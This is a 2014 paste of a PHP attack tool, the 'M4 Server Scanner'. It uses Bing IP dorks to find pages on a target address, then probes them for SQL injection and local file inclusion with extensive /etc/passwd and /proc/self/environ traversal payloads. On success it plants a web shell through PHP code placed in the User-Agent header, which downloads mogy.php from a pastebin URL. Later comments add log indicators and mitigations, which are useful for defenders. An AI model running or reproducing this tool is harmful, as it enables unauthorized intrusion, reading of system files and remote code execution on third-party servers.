inj3ctor_m4

M4 Server Scanner

Oct 14th, 2014
  1. <?php
  2. #M4 Server Scanner // INJ3CTOR_M4
  3. set_time_limit(0); // lifts PHP's execution time limit, so a long scan is never cut off
  4. error_reporting(0); // silences all PHP diagnostics; failed requests and bad parses go unreported
  5.  
  // Command-line dispatch. `-s VALUE` selects the SQL-error probe and `-l VALUE` the
  // file-inclusion probe; if both are given only -s runs (if/elseif).
  // VALUE is placed after Bing's `ip:` operator, so it is presumably an IP address:
  // the targets are whatever indexed URLs on that address carry the parameter
  // names listed in $dorks.
  // Defender note: on shared hosting every site on the address is in scope, and the
  // probes reach any page a search engine has indexed with one of these parameters.
  // Access-log review should key on the probe strings and User-Agent values further
  // down in this file rather than on the parameter names, which are ordinary.
  6. $options = getopt('s:l:');
  7. if (isset ($options['s'])){
  8.     echo"\n\t\tScanning SQLi From ".$options['s']."\n\n";
           // URL fragments used as search terms to find pages that take an id-style parameter
  9.     $dorks = array('?id=', '.php?id=', '.php?category=', '.php?cat=', '.php?article_id=', '.php?product_id=', '?attachment_id=');
  10.     foreach($dorks as $dork){
  11.         foreach(Bing_it ("ip:".$options['s']." $dork") as $url){
  12.             Check_Sql_Inj ($url);
  13.         }
  14.     }
  15. }elseif (isset ($options['l'])){
  16.     echo"\n\t\tScanning LFI From ".$options['l']."\n\n";
            // URL fragments used as search terms to find pages whose parameter looks like a file or page name
  17.     $dorks = array('.php?action=', '.php?download=', '.php?file=', '.php?f=', '.php?page=', '.php?pg=', '.php?pagina=', '.php?lang=', '.php?language=');
  18.     foreach($dorks as $dork){
  19.         foreach(Bing_it ("ip:".$options['l']." $dork") as $url){
  20.             lfi($url);
  21.         }
  22.     }
  23. }
  24.  
  // Bing_it($dork): collect search-result links for one query.
  // Requests Bing result pages at offsets 1, 11, 21, ... (at most 2000) with a
  // mobile-phone User-Agent and extracts the href of each result heading with a
  // regex tied to specific Bing markup (class "sb_h3 cttl").
  // Returns the de-duplicated list of links. When none were collected no return
  // statement is reached, so the caller receives null.
  25. function Bing_it ($dork){
  26.     for($i = 1; $i <= 2000; $i += 10){
  27.         $data = Get_Source ("http://www.bing.com/search?q=".urlencode($dork)."&first=$i","SamsungI8910/SymbianOS/9.1 Series60/3.0");
  28.         if (preg_match_all ('#<h2 class="sb_h3 cttl"><a href="(.*?)"#i', $data, $links)){
  29.             foreach($links[1] as $link){
  30.                 $allLinks[] = $link;
  31.             }
  32.             if (!preg_match ('#class="sb_pagN"#i', $data)) break; // no next-page marker in the HTML: stop paging
  33.         }
  34.     }
  35.     if(!empty($allLinks) && is_array($allLinks)){
  36.         return array_unique($allLinks);
  37.     }
  38. }
  39.  
  // Check_Sql_Inj($url): single-request, error-based SQL injection check.
  // Appends %27 (a URL-encoded single quote) to the URL, fetches it with a
  // User-Agent imitating a crawler, and prints "Vulnerable" when the response body
  // matches the database/PHP error pattern below. This is a text heuristic: a hit
  // means error text came back, not that injection was confirmed.
  // Defender notes: in access logs this appears as a query string ending in %27
  // sent with the User-Agent below. Parameterised queries remove the flaw itself;
  // display_errors=Off keeps error text out of responses but does not fix the query.
  40. function Check_Sql_Inj ($url){
  41.     $data = Get_Source ("$url%27","Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)");
  42.     if (preg_match ("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $data)){
  43.         echo "[+] $url >> Vulnerable !\r\n";
  44.     }else{
  45.         echo "[~] $url\r\n";
  46.     }
  47. }
  48.  
  // lfi($url): probe one URL parameter for local file inclusion, then attempt a file drop.
  // Stages, all visible below:
  //   1. Canary: the parameter value is replaced with "__dz__"; a response containing
  //      PHP's "failed to open stream" warning is treated as proof that the value
  //      reaches a file open/include call and that errors are displayed.
  //   2. Read test: path-traversal variants of /etc/passwd are requested and the body
  //      is checked for "root:x:".
  //   3. Environment test: traversal variants of /proc/self/environ are requested and
  //      the body is checked for "HTTP_HOST".
  //   4. On a stage-3 hit the same URL is requested again with PHP code as the
  //      User-Agent header; that code writes mogy.php from a remote paste. The script
  //      then fetches mogy.php and looks for the marker "By Mogy".
  // Indicators for log and host review, all taken from this listing: the parameter
  // value "__dz__"; "etc/passwd" or "proc/self/environ" in a query string; "....//"
  // sequences or a trailing %00; a User-Agent header containing a PHP open tag; a new
  // file named mogy.php beside the requested script; an outbound request from the web
  // server to pastebin.com.
  // Mitigation: never pass a request parameter to include/require/fopen. Map it to an
  // allowlist of known files instead, restrict reachable paths with open_basedir, and
  // keep display_errors off in production.
  49. function lfi($url){
  50.     $site = _Fix($url); // keep the URL only up to its first "=", so each probe becomes the parameter value
  51.     $data = Get_Source ($site.'__dz__',"Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)");
  52.     if (preg_match ("/failed to open stream/i", $data)){
  53.         echo "[+] $site >> Vulnerable !\r\n";
                // Traversal candidates at increasing depth. The "....//" forms are presumably aimed at
                // filters that strip "../" once, and the %00 suffix at old PHP builds that truncated
                // paths at a NUL byte -- both readings are inferred from the strings, not stated here.
  54.         $etcs = array ('/etc/passwd','../etc/passwd','../../etc/passwd','../../../etc/passwd','../../../../etc/passwd','../../../../../etc/passwd','../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../../etc/passwd','../../../../../../../../../etc/passwd','../../../../../../../../../../etc/passwd','../../../../../../../../../../../etc/passwd','../../../../../../../../../../../../etc/passwd','../../../../../../../../../../../../../etc/passwd','../../../../../../../../../../../../../../etc/passwd','../../../../../../../../../../../../../../../../etc/passwd','....//etc/passwd','....//....//etc/passwd','....//....//....//etc/passwd','....//....//....//....//etc/passwd','....//....//....//....//....//etc/passwd','....//....//....//....//....//....//etc/passwd','....//....//....//....//....//....//....//etc/passwd','....//....//....//....//....//....//....//....//etc/passwd','....//....//....//....//....//....//....//....//....//etc/passwd','....//....//....//....//....//....//....//....//....//....//etc/passwd','../../etc/passwd%00','../../../etc/passwd%00','../../../../etc/passwd%00','../../../../../etc/passwd%00','../../../../../../etc/passwd%00','../../../../../../../etc/passwd%00','../../../../../../../../etc/passwd%00','../../../../../../../../../etc/passwd%00','../../../../../../../../../../etc/passwd%00','../../../../../../../../../../../etc/passwd%00','../../../../../../../../../../../../etc/passwd%00','../../../../../../../../../../../../../etc/passwd%00','../../../../../../../../../../../../../../etc/passwd%00','../../../../../../../../../../../../../../../../etc/passwd%00','....//etc/passwd%00','....//....//etc/passwd%00','....//....//....//etc/passwd%00','....//....//....//....//etc/passwd%00','....//....//....//....//....//etc/passwd%00','....//....//....//....//....//....//etc/passwd%00','....//....//....//....//....//....//....//etc/passwd%00','....//....//....//....//....//....//....//....//etc/passwd%00','....//....
//....//....//....//....//....//....//....//etc/passwd%00','....//....//....//....//....//....//....//....//....//....//etc/passwd%00');
  55.         foreach ($etcs as $etc){
  56.             $data = Get_Source ($site.$etc,"Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)");
  57.             if (preg_match ("/root:x:/", $data)){ // the usual first entry of a passwd file, used as the success marker
  58.                 echo"\t[+] $etc : Passwd Found!\r\n";
  59.             }
  60.         }
  61.         $environs = array ('/proc/self/environ','../proc/self/environ','../../proc/self/environ','../../../proc/self/environ','../../../../proc/self/environ','../../../../../proc/self/environ','../../../../../../proc/self/environ','../../../../../../../proc/self/environ','../../../../../../../../proc/self/environ','../../../../../../../../../proc/self/environ','../../../../../../../../../../proc/self/environ','../../../../../../../../../../../proc/self/environ','../../../../../../../../../../../../proc/self/environ','../../../../../../../../../../../../../proc/self/environ','../../../../../../../../../../../../../../proc/self/environ','/proc/self/environ%00','../proc/self/environ%00','../../proc/self/environ%00','../../../proc/self/environ%00','../../../../proc/self/environ%00','../../../../../proc/self/environ%00','../../../../../../proc/self/environ%00','../../../../../../../proc/self/environ%00','../../../../../../../../proc/self/environ%00','../../../../../../../../../proc/self/environ%00','../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../../../../proc/self/environ%00');
  62.         foreach ($environs as $environ){
  63.             $data = Get_Source ($site.$environ,"Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)");
  64.             if (preg_match ("/HTTP_HOST/", $data)){ // request variables visible in the body: the environment file was read
  65.                 echo"\t[+] $environ : Environ Found!\r\n";
                        // Same URL again, with PHP code in the User-Agent header. Alerting on request headers
                        // that contain a PHP open tag catches this step regardless of which file name is used.
  66.                 Get_Source ($site.$environ,"<?php file_put_contents('mogy.php',file_get_contents('http://pastebin.com/raw.php?i=2aPpqpNP'));  ?>");
  67.                 $pathinfo = pathinfo($site);
  68.                 $shellpath = $pathinfo['dirname'].'/mogy.php'; // dropped file is expected in the same directory as the included script
  69.                 if (preg_match ("/By Mogy/", Get_Source ($shellpath))){
  70.                     echo"\tShell Uploaded: $shellpath\n\n";
  71.                 }else{
  72.                     echo"Environ Methode Don't Allowed\n\n";
  73.                 }
  74.             }
  75.         }
  76.     }
  77. }
  78.  
  // _Fix($site): return the URL up to and including its first "=", dropping the
  // original parameter value. The "?" after the first group is a regex quantifier,
  // not a literal question mark, so the second capture group holds everything before that "=".
  79. function _Fix($site){ preg_match_all("#(.*?)?(.*?)=(.*?)#",$site,$res); return $res[2][0]."="; }
  80.  
  // Get_Source($url, $user_agent): HTTP GET through cURL; returns whatever curl_exec()
  // returns with CURLOPT_RETURNTRANSFER set (the response body, or false on failure).
  // The User-Agent header is sent exactly as the caller supplies it, so in this
  // script it carries both spoofed client names and, in lfi(), PHP code.
  // Defender note: the fixed User-Agent strings on this page are usable as log
  // indicators, but they are plain string arguments and cannot be relied on alone.
  81. function Get_Source ($url, $user_agent){
  82.     $ch = curl_init();
  83.     curl_setopt ($ch, CURLOPT_URL, $url);
  84.     curl_setopt ($ch, CURLOPT_USERAGENT, $user_agent);
  85.     curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); // host-name check against the certificate disabled
  86.     curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); // certificate chain verification disabled
  87.     curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); // return the body from curl_exec() instead of printing it
  88.     curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); // follow HTTP redirects
  89.     curl_setopt ($ch, CURLOPT_ENCODING, "gzip, deflate, compress");
  90.     curl_setopt ($ch, CURLOPT_FRESH_CONNECT, 1); // new connection per request, no reuse
  91.     $source = curl_exec($ch);
  92.     curl_close($ch);
  93.    
  94.     return $source;
  95. }